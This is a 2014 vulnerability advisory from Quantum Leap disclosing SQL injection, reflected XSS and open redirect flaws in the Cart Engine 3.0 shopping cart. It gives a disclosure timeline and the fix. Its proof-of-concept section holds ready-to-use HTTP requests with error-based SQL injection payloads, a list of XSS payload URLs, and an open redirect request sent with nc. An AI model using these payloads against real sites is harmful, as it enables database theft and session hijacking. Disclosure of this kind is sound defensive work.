• Consulting
  • Information Security
  • Networking
  • Software Development
  • R&D
  • Cart Engine 3.0 Multiple vulnerabilities – SQL Injection, Reflected XSS, Open Redirect

    15-09-2014

    cart_engine_logo

    Cart Engine 3.0 Multiple vulnerabilities – SQL Injection, Reflected XSS, Open Redirect

    Quantum Leap Advisory: Cart Engine 3.0 Multiple vulnerabilities – SQL Injection, Reflected XSS, Open Redirect – Adivsory #QLA140808
    Affected Product: Cart Engine 3.0
    Credits: Vulnerability discovered by Francesco Perna and Pietro Minniti of Quantum Leap s.r.l

    Executive Summary

    SQL Injection: Using a specially crafted HTTP request, it is possible to exploit a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters of cart.php page. Successful exploitation of the vulnerabilities results in read sensitive data from the database and, in some cases, execute administration operation on the database or issue commands to the operating system.

    Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit a lack in the neutralization[2] of multiple pages output which includes the user submitted content. Successful exploitation of the vulnerabilities, results in the execution of arbitrary HTML and script code in the user’s browser in the context of the victim user’s session trough a “Reflected XSS”.

    Open Redirect: Using a specially crafted HTTP request, it is possible to redirect[3] the normal browsing of users to a malicious site by modifying untrusted URL input in Referer HTTP header parameter in index.php, cart.php, msg.php and page.php pages. Successful exploitation of the vulnerabilities results in phishing scam, user credential theft, malware dissemination.

    Proof of Concept

    SQL Injection (based on MySQL)

    A SQL Injection vulnerability has been detected on cart.php page in Cart Engine CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id” parameter, so error based and boolean-based blind or time-based blind SQL Injection attacks can be executed.

    POST /cart.php HTTP/1.1
    Host: eshop.hacme.hac
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://eshop.hacme.hac/detail.php?item_id=8
    Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=—————————109606523931762158449252347
    Content-Length: 774
     
    —————————–109606523931762158449252347
    Content-Disposition: form-data; name=”AXSRF_token”
     
     
    —————————–109606523931762158449252347
    Content-Disposition: form-data; name=”cmd”
     
    add
    —————————–109606523931762158449252347
    Content-Disposition: form-data; name=”item_id[0]”
     
    8′ AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND ‘ql’=’ql
    —————————–109606523931762158449252347
    Content-Disposition: form-data; name=”qty[0]”
     
    1
    —————————–109606523931762158449252347
    Content-Disposition: form-data; name=”qty[0]”
     
    1
    —————————–109606523931762158449252347–

    Figure 1 shows database user.

    EV-01-SQL-Injection1

    Figure 1 – Cart Engine 3.0 SQL Injection PoC 1

     

    POST /cart.php HTTP/1.1
    Host: eshop.hacme.hac
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://eshop.hacme.hac/detail.php?item_id=13
    Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=—————————1948855485207142787318084006
    Content-Length: 2353
     
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”AXSRF_token”
     
     
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”cmd”
     
    add
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”item_id[0]”
     
    13
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”qty[0]”
     
    1
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”qty[0]”
     
    1
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”prod_opt_3″
     
    3
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”prod_opt_12″
     
     
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”item_id[]”
     
     
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”qty[]”
     
    1
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”item_id[]”
     
    ‘ AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND ‘ql’=’ql
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”qty[]”
     
    1
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”item_id[]”
     
     
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”qty[]”
     
    1
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”item_id[]”
     
     
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”qty[]”
     
    1
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”item_id[]”
     
     
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”qty[]”
     
    1
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”item_id[]”
     
     
    —————————–1948855485207142787318084006
    Content-Disposition: form-data; name=”qty[]”
     
    1
    —————————–1948855485207142787318084006–

    Figure 2 shows database name.

    EV-02-SQL-Injection2

    Figure 2 – Cart Engine 3.0 SQL Injection PoC 2

    Reflected XSS

    A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine CMS. In the file “skins/default/outline.tpl”, the parameter “path” in section “drop down TOP menu (with path)” and the parameter “$print_this_page” in section “footer_content_block” are not sanitized, so an XSS attack can be executed on multiple pages.

    /index.php?”><script>alert(‘XSS’)<%2fscript>
    /index.php?’%3balert(‘XSS’)%2f%2f
    /checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
    /checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
    /contact.php?”><script>alert(‘XSS’)<%2fscript>
    /contact.php?’%3balert(‘XSS’)%2f%2f
    /detail.php?item_id=10&’%3balert(‘XSS’)%2f%2f
    /detail.php?item_id=10&”><script>alert(‘XSS’)<%2fscript>
    /distro.php?’%3balert(‘XSS’)%2f%2f
    /distro.php?”><script>alert(‘XSS’)<%2fscript>
    /newsletter.php?’%3balert(‘XSS’)%2f%2f
    /newsletter.php?”><script>alert(‘XSS’)<%2fscript>
    /page.php?pid=2&”><script>alert(‘XSS’)<%2fscript>
    /page.php?pid=2&’%3balert(‘XSS’)%2f%2f
    /profile.php?”><script>alert(‘XSS’)<%2fscript>
    /profile.php?’%3balert(‘XSS’)%2f%2f
    /search.php?mod_id=_shop&cmd=list&cat_id=1&’%3balert(‘XSS’)%2f%2f
    /search.php?mod_id=_shop&cmd=list&cat_id=1&”><script>alert(‘XSS’)<%2fscript>
    /sitemap.php?’%3balert(‘XSS’)%2f%2f
    /sitemap.php?”><script>alert(‘XSS’)<%2fscript>
    /task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&”><script>alert(‘XSS’)<%2fscript>
    /task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&’%3balert(‘XSS’)%2f%2f
    /tell.php?’%3balert(‘XSS’)%2f%2f
    /tell.php?”><script>alert(‘XSS’)<%2fscript>

    Figures 3 and 4 show XSS PoC.

    EV-01-XSS

    Figure 3 – Cart Engine 3.0 Reflected XSS PoC 1

    EV-02-XSS

    Figure 4 – Cart Engine 3.0 Reflected XSS PoC 2

    Open Redirect

    An Open Redirect vulnerability has been detected on multiple pages in Cart Engine CMS. The function “redir” in file “includes/function.php” doesn’t check the “$_SERVER[‘HTTP_REFERER’]” parameter, so an Open Redirect attack can be executed.

    ## HTTP REQUEST ##
    GET /page.php HTTP/1.1
    Host: eshop.hacme.hac
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://www.google.com/search?hl=en&q=
    Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
    Connection: close
     
    $ cat openredirect.req | nc -vvv eshop.hacme.hac 80
    hacme.hac [10.0.2.80] 80 (http) open
    HTTP/1.1 302 Found
    Date: Sun, 10 Aug 2014 15:16:34 GMT
    Server: Apache/2.2.15 (CentOS)
    X-Powered-By: PHP/5.3.3
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: http://www.google.com/search?hl=en&q=
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
     
    sent 403, rcvd 380

     

    Solution

    Upgrade to Cart Engine 4.0.

    Disclosure Timeline

    2014-08-08 – Vulnerability Discovered
    2014-08-10 – Initial vendor notification
    2014-08-20 – The vendor fixed the vulnerability
    2014-09-15 – Public advisory

    References

    [1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
    [2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
    [3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet